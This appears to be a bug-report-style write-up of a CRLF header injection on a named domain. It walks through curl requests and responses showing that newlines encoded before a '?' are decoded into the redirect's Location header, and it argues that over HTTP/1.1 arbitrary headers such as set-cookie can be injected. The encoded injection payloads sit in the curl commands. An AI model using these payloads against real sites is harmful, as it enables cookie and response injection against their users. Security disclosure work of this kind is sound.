ubuntu@rwx:~$ curl -v 'http://a.d-cd.net/' > GET / HTTP/1.1 > Host: a.d-cd.net > User-Agent: curl/7.58.0 > Accept: */* > < HTTP/1.1 301 Moved Permanently < Server: nginx < Date: Tue, 28 Jan 2020 19:39:09 GMT < Content-Type: text/html < Content-Length: 162 < Connection: keep-alive < Location: https://a.d-cd.net/ < X-Clacks-Overhead: GNU Terry Pratchett < <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html>
I did not understand the contents of the server associated with the domain a.d-cd.net and did not perform analysis on the server. Since a.d-cd.net server basically supports hsts. If you we try http request, It will be redirected to https.
ubuntu@rwx:~$ curl -v https://a.d-cd.net/path? * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x55600336c580) > GET /path? HTTP/2 > Host: a.d-cd.net > User-Agent: curl/7.58.0 > Accept: */* > * Connection state changed (MAX_CONCURRENT_STREAMS updated)! < HTTP/2 301 < server: nginx < date: Tue, 28 Jan 2020 19:23:20 GMT < content-type: text/html < content-length: 162 < location: https://a.d-cd.net/path < x-clacks-overhead: GNU Terry Pratchett < x-content-type-options: nosniff < strict-transport-security: max-age=31622400 < <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html> * Connection #0 to host a.d-cd.net left intact
Scanning the server, I noticed something unusual. Regardless of the content, If URL ?a=b (search) part exists, server remove it and make us redirect again. I think it’s for caching, but I’m not sure.
simply, http request is redirected to https. and https request that contains ?... is redirected without ?...... part. when the part of ? is deleted, the part of path makes url decoded in response.
1 2 3 4 5 6 7 8 9 10 11 12 13
ubuntu@rwx:~$ curl -v 'https://a.d-cd.net/path%0aheader:%20value%0a?' > GET /path%0aheader:%20value%0a? HTTP/2 > Host: a.d-cd.net > User-Agent: curl/7.58.0 > Accept: */* > * Connection state changed (MAX_CONCURRENT_STREAMS updated)! * http2 error: Invalid HTTP header field was received: frame type: 1, stream: 1, name: [location], value: [https://a.d-cd.net/path header: value ] * HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1) * Connection #0 to host a.d-cd.net left intact curl: (92) HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)
I thought this would be available for crlf injection, but the h2 setting would allow meta-data verification. Blocking was being performed by error when trying to crlf injection. I don’t know if this is intended, but h2 errors are preventing malicious headers from being inserted into the browser.
The above screen shows the occurrence of a http2 error in the latest version of Chrome when you connect to the address https://a.d-cd.net/%0aa%0a? (browsers support http2 causes the same as curl)
These errors can work as a mitigation, but It is not sufficient. The browser prefers http2 communication, but is server still support http1.1 or earlier. When a user connects to a server using a proxy does not support http2, the browsers will connects with http1.1 so It may makes header injection plainly.
<html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html> * Connection #0 to host a.d-cd.net left intact
For example, curl sends a request with the http1.1 option. You can verify that it is received with the set-cookie header without errors.
In conclusion, crlf injection is possible if the user uses a proxy or browser that does not support http2 (ALPN). Any header and content can be inserted into the response packet.